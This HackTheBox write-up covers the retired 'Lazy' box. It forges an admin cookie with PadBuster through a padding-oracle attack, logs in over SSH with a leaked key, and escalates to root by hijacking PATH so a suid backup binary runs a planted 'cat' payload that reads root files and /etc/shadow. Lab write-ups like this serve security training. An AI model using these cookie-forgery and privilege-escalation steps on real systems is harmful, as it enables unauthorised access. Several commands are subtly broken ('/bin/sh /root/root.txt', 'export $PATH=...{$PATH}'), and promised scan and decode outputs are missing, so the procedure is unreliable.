Lazy


HackTheBox

Lazy - HackTheBox

This writeup is for one of the Retired boxes on HackTheBox called Lazy [1].

Step 1 - Recon & Enumeration

I started with Nmap, UDP Proto Scanner, Nikto and Dirbuster. Starting with Nmap on host 10.10.10.18 we have

The other 3 tools did not show anything important.

Step 2 - Exploitation

This box gave me a really hard time up until the time were I realized what I had to do in order to exploit it. The attacks I tried were:

 1. Use Dirbuster to look for interesting files and folders
 2. SQL injection in register.php and login.php
 3. Using Hydra and rockyou to brute force login.php
 4. Review all Requests and Responses using Burp Suite

Using Burp Suite's Repeater we can actually see that the user has two Cookies assigned, the PHPSESSID and auth.

Since PHPSESSID is fairly secure I focused on auth, mostly because it had a different format than PHPSESSID. Now, if we actually base64 decode the auth value we get:

The Invalid Padding error shows that the box might be vulnerable to the Oracle padding attack. The fastest way to find out is via Padbuster. PadBuster is a Perl script for automating Padding Oracle Attacks [2]. PadBuster provides the capability to decrypt arbitrary ciphertext, encrypt arbitrary plaintext, and perform automated response analysis to determine whether a request is vulnerable to padding oracle attacks.

 padbuster http://10.10.10.18/ nh02G3bWp1Fr7zSug99gBgowY9FByHe7 8 --cookies auth=nh02G3bWp1Fr7zSug99gBgowY9FByHe7 --encoding 0
 padbuster http://10.10.10.18/ nh02G3bWp1Fr7zSug99gBgowY9FByHe7 8 --cookies auth=nh02G3bWp1Fr7zSug99gBgowY9FByHe7 --encoding 0 -plaintext user=admin

The result provided by Padbuster is the admin cookie, so we can now log in as admin. Accessing the admin page we get a url that provides us with a username (mitsos) and an ssh key. Save the ssh key to a file and give it specific permissions:

 chmod 600 id_rsa
 ssh -i id_rsa mitsos@10.10.10.18

Now we can read the user.txt file.


I immediately noticed a binary named backup with suid bit set. If you run it you will get the /etc/shadow file.


The first thing I did was to get the root password and give it to John the Ripper to try and crack it, with the help of the rockyou list. Unfortunately, this was not the way to solve this challenge.

Step 3 - From User to Admin

Using strings, strace and ltrace, I was able to identify that the suid binary contained a specific line:

 cat /etc/shadow

Noticed anything weird?

Because cat does not contain its full path, /bin/cat, it is possible to create an executable named cat in /home/mitsos/ and change the $PATH environment variable to point to /home/mitsos/ and not /bin/. This will cause our cat executable to run. So, all we need now is to insert our payload in the cat file.

 /bin/sh /root/root.txt > /tmp/fld/ft.txt
 chmod +x cat
 export $PATH=/home/mitsos:{$PATH}
 which cat

All we need to do now is run the backup binary and wait for our file to be created in order to read the root.txt hash.

References

[1] HackTheBox
[2] Automated Padding Oracle Attacks With PadBuster